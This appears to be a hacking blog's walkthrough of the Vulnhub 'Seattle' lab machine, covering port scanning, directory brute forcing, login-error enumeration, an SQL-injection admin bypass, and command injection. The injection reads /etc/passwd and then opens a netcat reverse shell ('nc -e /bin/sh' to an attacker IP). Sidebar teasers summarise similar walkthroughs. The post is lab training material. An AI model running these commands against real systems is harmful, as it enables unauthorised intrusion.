Seatle Vulhun

-
Chill I got the admin panel and shell privelge was only apache though i got the knowledge of Sql-injection and i use Burpsuit

Let's Breach


Penetration Methodologies:

Finding Ip

  • NMAP

Enumeration

  • Browsing HTTP Service
  • Directory Bruteforce using dirb

Exploitation

  • Sql-Injection 
  • Reverse shell using NC


I got the IP of Victim machine and it was 192.168.1.10

I use Nmap to scan what port are open and found that only 80 port was open using apache 2.4.16.I didn't found any serious exploit


The OS was Fedora 

I surf  the port 80 and found as online shopping page IDK i was right or wrong




Then i go for directory bruteforcing using dirb as my favourite tool.However you can use gobuster also some recommended me highly because of it's feautures

dirb -h http://192.168.1.10

and boom i got the admin.php directory that was quick



and in source page of index.php i found terms.php where i can use it later so i saved it in my text editor

admin@seattlesounds.net

while enumerating admin panel 






The email  found that i found was at the bottom of the page





Then i go for admin and found some php file and the admin.php was a login page 


I register the test@gmail.com and login as test


I got login as test you can just do it manully .However i tried first wrong email and password and then again  use test@gmail.com and wrong password then i found some interesting 

There was two things to see 







Invalid username and invalid password was the result what i thought to but




and again you see with right email and wrong password the result was interesting.

so,let's use the mail we found in terms.php page

and the result was interesting




Invalid password means the mail was correct 

Let's check for the sql-injection i though for this site it was the right choice i fireup the burp and found that the vulneribiltiy was sql-injection where i can bypass the admin panel and i was damm right




Let's brech the admin panel 

Forwarding the page with this request to gain admin page was enough 


I think the page can be gained just by typing the URL that i was redirected 




The page was fully loaded with input text field i though of command injection and found that in Log Name you can just type 'cat /etc/passwd' 2>&1;

to see all the text in /etc/passwd file this confirms that i can land my reverse shell bash script in Log input 



Let's do reverse netcat with prot 9999

'nc -e /bin/sh 192.168.1.8 9999' 2&>1;



Boom i got the reverse shell






The box was not that hard 


 HAPPY HACKING :)



















Comments

Post a Comment

Popular posts from this blog

Wordpress Reverse Shell

-
Image
Wordpress Reverse Shell This post is related to WordPress security testing to identify what will be possible procedure to exploit WordPress by compromising admin console. We have already setup WordPress in our windows 7 machine. Table of Content 1) Metasploit Framework 3) Upload PHP reverse shell 4) Getting reverse shell connection Requirement: Host machine: WordPress Attacker machine: Kali Linux WordPress Credential: admin: password Let's begin 1) 1st Method  The site which we are going to test is: i login into the wordpress admin Now i check upload the reverse shell (PHP) using metasploit BOOOOOOM : I got the interactive shell of windows 7 machine Let's breach in another way 2) 2nd Method I have already done login into wordpress using admin and password So, Create a PHP code file using msfvenom Now Go to the Apprereance -> Theme editor -> 404.php templetes past a php code ...
Read more

SAR1 VULHUB WALKTHROUGH

-
Image
SAR1 (Walkthrough) This Box Is From Vulhub You Can Download It From  Link .This Box is like OSCP box which i beleive is .I pwned this box using LFI leads to RCE. Breaching Process  Finding IP Netdiscover Enumeration Browsing HTTP  service Nmap scan Enumerating directory using nikto and dirb Found robots.txt and other useful directory Enumerating sar2HTML Exploitation using searchsploit for sar2HTML found RCE Injecting php code using (wget) Got reverse shell using NC Privilege Escalation Found crontab execute shell in 5 min. Add the sudoers permission for www-data. Got root permission  Let's Breach   Using netdiscover  i found the box ip address.The ip address was 192.168.248.136 Then i scan the IP using nmap The command is nmap -sSVC -A 192.168.248.136 | tee nmap.txt Here the scan shows only 80 port which was default page of apache There was no thing to see so,i need to dig d...
Read more

EVM: 1 Vulnhub Walkthrough

-
Image
Penetration Methodologies: Finding IP Nmap Enumeration Browsing HTTP Service Directory Bruteforce using dirb Enumeration Using WPScan Password Bruteforce using WPScan Getting Login Credentials Exploitation Exploiting using Metasploit  Getting a reverse connection  Spawning a TTY Shell  Enumeration for Root Credentials Privilege Escalation  Getting Login Credentials Logging in as root Reading the Final Flag Let's Breach:     First of all finding IP for the machine i use bridge connection.The IP of machine was 192.168.1.5 I quickly nmap the website found 80 open Then i browse the server and found that apache default page and phpinfo() Nothing interesting then i bruteforce the directory you can use gobuster and nikto also While scan is complete i found a wordpress directory that leads me to an another website Then i quickly browse the http://192.168.1.5/wordpress then i found the page d...
Read more